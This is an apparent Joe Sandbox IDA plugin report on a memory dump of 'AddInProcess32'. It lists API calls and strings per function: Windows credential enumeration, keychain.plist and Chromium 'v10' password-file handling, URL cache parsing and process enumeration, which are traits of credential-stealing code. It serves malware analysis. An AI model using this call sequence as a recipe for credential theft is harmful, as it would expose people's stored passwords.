37593 4227f0 memset memcpy 37558->37593 37594 422b84 15 API calls 37558->37594 37595 422b5d memset memcpy memcpy 37558->37595 37596 422640 13 API calls 37558->37596 37598 4241fc 11 API calls 37558->37598 37599 42413a 90 API calls 37558->37599 37559->37558 37606 415c56 11 API calls 37560->37606 37565 429a96 37561->37565 37608 416760 11 API calls 37561->37608 37602 415c56 11 API calls 37563->37602 37609 424251 120 API calls 37565->37609 37568 429a7a 37607 416760 11 API calls 37568->37607 37573->37557 37597 415c56 11 API calls 37573->37597 37576->37573 37600 422640 13 API calls 37576->37600 37601 4226e0 12 API calls 37576->37601 37578 42014c 37577->37578 37581 420151 37577->37581 37620 41e466 97 API calls 37578->37620 37580 420162 37580->37558 37581->37580 37582 4201b3 37581->37582 37583 420229 37581->37583 37584 4201b8 37582->37584 37585 4201dc 37582->37585 37583->37580 37586 41fd5e 86 API calls 37583->37586 37611 41fbdb 37584->37611 37585->37580 37589 4201ff 37585->37589 37617 41fc4c 37585->37617 37586->37580 37589->37580 37592 42013a 97 API calls 37589->37592 37592->37580 37593->37558 37594->37558 37595->37558 37596->37558 37597->37551 37598->37558 37599->37558 37600->37576 37601->37576 37602->37551 37603->37549 37604->37557 37605->37558 37606->37568 37607->37565 37608->37565 37609->37542 37610->37551 37612 41fbf8 37611->37612 37615 41fbf1 37611->37615 37625 41ee26 37612->37625 37616 41fc39 37615->37616 37635 4446ce 11 API calls 37615->37635 37616->37580 37621 41fd5e 37616->37621 37618 41ee6b 86 API calls 37617->37618 37619 41fc5d 37618->37619 37619->37585 37620->37581 37623 41fd65 37621->37623 37622 41fdab 37622->37580 37623->37622 37624 41fbdb 86 API calls 37623->37624 37624->37623 37626 41ee41 37625->37626 37627 41ee32 37625->37627 37636 41edad 37626->37636 37639 4446ce 11 API calls 37627->37639 37630 41ee3c 37630->37615 37633 41ee58 37633->37630 37641 41ee6b 37633->37641 37635->37616 37645 41be52 37636->37645 37639->37630 37640 41eb85 11 API calls 37640->37633 
37642 41ee70 37641->37642 37643 41ee78 37641->37643 37698 41bf99 86 API calls 37642->37698 37643->37630 37646 41be6f 37645->37646 37647 41be5f 37645->37647 37653 41be8c 37646->37653 37677 418c63 memset memset 37646->37677 37676 4446ce 11 API calls 37647->37676 37650 41bee7 37651 41be69 37650->37651 37681 41a453 86 API calls 37650->37681 37651->37630 37651->37640 37653->37650 37653->37651 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37680 4446ce 11 API calls 37654->37680 37657 41bef0 37655->37657 37660 41bee2 37655->37660 37657->37650 37658 41bf01 37657->37658 37659 41bf24 memset 37658->37659 37664 41bf14 37658->37664 37678 418a6d memset memcpy memset 37658->37678 37659->37651 37666 41ac13 37660->37666 37679 41a223 memset memcpy memset 37664->37679 37665 41bf20 37665->37659 37667 41ac52 37666->37667 37668 41ac3f memset 37666->37668 37670 41ac6a 37667->37670 37682 41dc14 19 API calls 37667->37682 37673 41acd9 37668->37673 37672 41aca1 37670->37672 37683 41519d 37670->37683 37672->37673 37674 41acc0 memset 37672->37674 37675 41accd memcpy 37672->37675 37673->37650 37674->37673 37675->37673 37676->37651 37677->37653 37678->37664 37679->37665 37680->37650 37682->37670 37686 4175ed 37683->37686 37694 417570 SetFilePointer 37686->37694 37689 41760a ReadFile 37690 417637 37689->37690 37691 417627 GetLastError 37689->37691 37692 41763e memset 37690->37692 37693 4151b3 37690->37693 37691->37693 37692->37693 37693->37672 37695 4175b2 37694->37695 37696 41759c GetLastError 37694->37696 37695->37689 37695->37693 37696->37695 37697 4175a8 GetLastError 37696->37697 37697->37695 37698->37643 37699 417bc5 37700 417c61 37699->37700 37701 417bda 37699->37701 37701->37700 37702 417bf6 UnmapViewOfFile CloseHandle 37701->37702 37704 417c2c 37701->37704 37706 4175b7 37701->37706 37702->37701 37702->37702 37704->37701 37711 41851e 20 API calls 37704->37711 37707 4175d6 CloseHandle 37706->37707 37708 4175c8 37707->37708 37709 4175df 37707->37709 37708->37709 37710 4175ce Sleep 
37708->37710 37709->37701 37710->37707 37711->37704 37718 4415ea 37726 4304b2 37718->37726 37720 4415fe 37721 4418ea 37720->37721 37722 442bd4 37720->37722 37723 4418e2 37720->37723 37722->37721 37774 441409 memset 37722->37774 37723->37721 37773 4414a9 12 API calls 37723->37773 37775 43041c 12 API calls 37726->37775 37728 4304cd 37733 430557 37728->37733 37776 43034a memcpy 37728->37776 37730 4304f3 37730->37733 37777 430468 11 API calls 37730->37777 37732 430506 37732->37733 37734 43057b 37732->37734 37778 43817e 37732->37778 37733->37720 37783 415a91 37734->37783 37739 4305e4 37739->37733 37788 4328e4 12 API calls 37739->37788 37741 43052d 37741->37733 37741->37734 37744 430542 37741->37744 37743 4305fa 37745 430609 37743->37745 37789 423383 11 API calls 37743->37789 37744->37733 37782 4169a7 11 API calls 37744->37782 37790 423330 11 API calls 37745->37790 37748 430634 37791 423399 11 API calls 37748->37791 37750 430648 37792 4233ae 11 API calls 37750->37792 37752 43066b 37793 423330 11 API calls 37752->37793 37754 43067d 37794 4233ae 11 API calls 37754->37794 37756 430695 37795 423330 11 API calls 37756->37795 37758 4306d6 37797 423330 11 API calls 37758->37797 37759 4306a7 37759->37758 37760 4306c0 37759->37760 37796 4233ae 11 API calls 37760->37796 37763 4306d1 37798 430369 17 API calls 37763->37798 37765 4306f3 37799 423330 11 API calls 37765->37799 37767 430704 37800 423330 11 API calls 37767->37800 37769 430710 37801 423330 11 API calls 37769->37801 37771 43071e 37802 423383 11 API calls 37771->37802 37773->37721 37774->37722 37775->37728 37776->37730 37777->37732 37779 438187 37778->37779 37781 438192 37778->37781 37803 4380f6 37779->37803 37781->37741 37782->37733 37784 415a9d 37783->37784 37785 415ab3 37784->37785 37786 415aa4 memset 37784->37786 37785->37733 37787 4397fd memset 37785->37787 37786->37785 37787->37739 37788->37743 37789->37745 37790->37748 37791->37750 37792->37752 37793->37754 37794->37756 37795->37759 37796->37763 37797->37763 
                                                                                                  Control-flow Graph
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040DDAD
                                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                    • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                    • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                  • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                  • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                  • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                  • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                  • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                  • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                  • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                  • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                  • memset.MSVCRT ref: 0040DF5F
                                                                                                  • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                  • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                  • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                  • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                  • API String ID: 708747863-3398334509
                                                                                                  • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                  • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                  • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                                                                  • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                  APIs
                                                                                                    • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                    • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                    • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                  • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                  • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                  • free.MSVCRT ref: 00418803
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                  • String ID:
                                                                                                  • API String ID: 1355100292-0
                                                                                                  • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                  • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                  • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                  • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                  APIs
                                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                  • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileFind$FirstNext
                                                                                                  • String ID:
                                                                                                  • API String ID: 1690352074-0
                                                                                                  • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                  • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                  • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                  • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0041898C
                                                                                                  • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InfoSystemmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3558857096-0
                                                                                                  • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                  • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                  • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                                                                  • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                  Control-flow Graph
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004455C2
                                                                                                  • wcsrchr.MSVCRT ref: 004455DA
                                                                                                  • memset.MSVCRT ref: 0044570D
                                                                                                  • memset.MSVCRT ref: 00445725
                                                                                                    • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                    • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                    • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                    • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                    • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                    • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                    • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                    • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                  • memset.MSVCRT ref: 0044573D
                                                                                                  • memset.MSVCRT ref: 00445755
                                                                                                  • memset.MSVCRT ref: 004458CB
                                                                                                  • memset.MSVCRT ref: 004458E3
                                                                                                  • memset.MSVCRT ref: 0044596E
                                                                                                  • memset.MSVCRT ref: 00445A10
                                                                                                  • memset.MSVCRT ref: 00445A28
                                                                                                  • memset.MSVCRT ref: 00445AC6
                                                                                                    • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                    • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                    • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                    • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                    • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                  • memset.MSVCRT ref: 00445B52
                                                                                                  • memset.MSVCRT ref: 00445B6A
                                                                                                  • memset.MSVCRT ref: 00445C9B
                                                                                                  • memset.MSVCRT ref: 00445CB3
                                                                                                  • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                  • memset.MSVCRT ref: 00445B82
                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                    • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                  • memset.MSVCRT ref: 00445986
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                  • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                  • API String ID: 2263259095-3798722523
                                                                                                  • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                  • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                  • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                                                                  • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                    • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                    • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                    • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                  • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                                                                  • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                                                                  • String ID: $/deleteregkey$/savelangfile
                                                                                                  • API String ID: 2744995895-28296030
                                                                                                  • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                  • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                                                                  • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                                                                  • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 0040B71C
                                                                                                    • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                                                    • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                                                                  • wcsrchr.MSVCRT ref: 0040B738
                                                                                                  • memset.MSVCRT ref: 0040B756
                                                                                                  • memset.MSVCRT ref: 0040B7F5
                                                                                                  • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                  • CopyFileW.KERNEL32(00445FAE,?,00000000,?,?), ref: 0040B82D
                                                                                                  • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                                                                  • memset.MSVCRT ref: 0040B851
                                                                                                  • memset.MSVCRT ref: 0040B8CA
                                                                                                  • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0040BAE5
                                                                                                  • memset.MSVCRT ref: 0040BB53
                                                                                                  • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                                                                  • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$File$Freewcsrchr$AddressCloseCopyCreateDeleteHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                                                                  • String ID: chp$v10
                                                                                                  • API String ID: 4165125987-2783969131
                                                                                                  • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                  • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                                                                  • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                                                                  • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                  • free.MSVCRT ref: 0040E49A
                                                                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                  • memset.MSVCRT ref: 0040E380
                                                                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                  • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                  • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                  • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                                                                  • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                  • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                  • String ID:
                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                  • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                  • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                                                                  Control-flow Graph

                                                                                                  APIs
                                                                                                    • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                  • memset.MSVCRT ref: 00413D7F
                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                  • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                  • memset.MSVCRT ref: 00413E07
                                                                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                  • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                  • free.MSVCRT ref: 00413EC1
                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                  • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                  • API String ID: 1344430650-1740548384
